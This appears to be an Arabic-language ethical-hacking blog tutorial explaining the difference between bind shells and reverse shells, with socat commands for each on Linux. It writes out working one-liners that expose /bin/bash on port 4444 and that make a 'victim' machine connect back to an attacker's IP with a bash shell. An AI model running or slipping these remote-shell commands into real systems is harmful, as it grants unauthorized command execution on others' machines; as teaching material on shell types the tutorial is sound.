إجراء إتصال عكسي بإستخدام أداة socat على لينكس و الفرق بين Bind Shell و Reverse Shell - Programmer Tech

Programmer Tech

تعلم البرمجة - علوم الكمبيوتر - أمن المعلومات - القرصنة الأخلاقية

إعلان اعلى المقالة

الأحد، 13 يونيو 2021

إجراء إتصال عكسي بإستخدام أداة socat على لينكس و الفرق بين Bind Shell و Reverse Shell

socat remote shell

قبل إستخدام أداة netcat في الإتصال العكسي على shell يجب علينا في البداية معرفة ما هو shell.
 

ما هو الشيل shell

الشيل shell يُمكن وصفهُ على أنه مجموعة من الأكواد البرمجية التي يٌمكن إستخدامها في تنفيذ الأوامر على بعض الأجهزة المُختلفة سواء داخل الشبكة أو خارج الشبكة, و هناك نوعين نستطيع من خلالهما الحصول على إتصال عكسي بين 2 machine و هم bind shell أو reverse shell و كل نوع من تلك الأنواع لهٌ طرق الإتصال المٌختلفة, لنتعرف على كل واحد منهم و ما الإختلاف بينهم و سنقوم بإستخدام أداة socat.
 

Socat Bind Shell

يُعتبَر هذا نوع من أنواع shell الذي يقوم من خلاله الجهاز المستهدف أو الضحية بفتح port أو منفذ خاص للتنصت و ينتظر الإتصال الخارجي من أي جهاز آخر بحيث يقوم المُخترق بالإتصال على machine من خلال المنفذ و بإعتبار أنه يٌمكن التنصت يٌمكن أيضاً تشغيل البرامج التنفيذية في الحاسوب مثل cmd.exe في نظام windows و ايضاً bin/bash في نظام linux, الأمر أصبح مفهوماً bind shell يجب أن يكون الضحية في وضع التنصت listening و يقوم المُخترق بالإتصال عليه.

socat bind shell


socat -d -d tcp4-listen:4444,fork exec:/bin/bash

قُمنا بإستخدام أداة socat في عمل تنصت على هذا المنفَذ مع إضافة تشغيل bin/bash المتحكم في نظام linux, و معنى هذا أي شخص يقوم بالإتصال على machine من خلال هذا المنفذ 4444 ستقوم بتشغيل الملف التنفيذي bin/bash.

socat -d -d - tcp-connect:192.168.1.2:4444


قُمنا هنا بالإتصال على machine من جهاز آخر و يُمكننا الآن تنفيذ أوامر bash على الحاسوب, يختلف الأمر في نظام windows علينا تغيير bin/bash بـ cmd.exe .

socat bind shell

Socat Reverse Shell

هذا النوع من الـ Shell يعكس حالة Bind shell و هنا يقوم الـ Hacker الذي يقوم بعمل وضع التنصت و الضحية هي التي سوف تقوم بالإتصال عليه, تحدث تلك الحالة كثيراً في إنشاء Payloads أو Trojans بشكل عام و اكثر الأدوات المستخدمة هي metasploit حيث تقوم بإنشاء payload الخاص بك لكن عند إرسال payload تقوم بتشغيل وضع التنصت داخل metasploit هذا هو Reverse Shell, الـ Hacker هو الذي يقوم بوضع التنصت و الضحية تقوم بالإتصال عليه و سنقوم الآن بإستخدام Socat.
socat reverse shell


socat -d tcp4-listen:4444 stdout

هنا قُمنا بالتنصت على هذا المنفذ في جهاز الـ Hacker.

socat -d -d tcp-connect:192.168.1.9:4444 exec:/bin/bash

قُمنا بالإتصال على الجهاز ip address الخاص به 192.168.1.9 بالإضافة لتشغيل bin/bash المُتحكم في نظام linux و يختلف الأمر في نظام windows و سيكون الملف التنفيذي هو cmd.exe و نستطيع الآن تنفيذ أوامر bash.
socat reverse shell


هناك 3 تعليقات:

facebook

نموذج الاتصال

الاسم

بريد إلكتروني *

رسالة *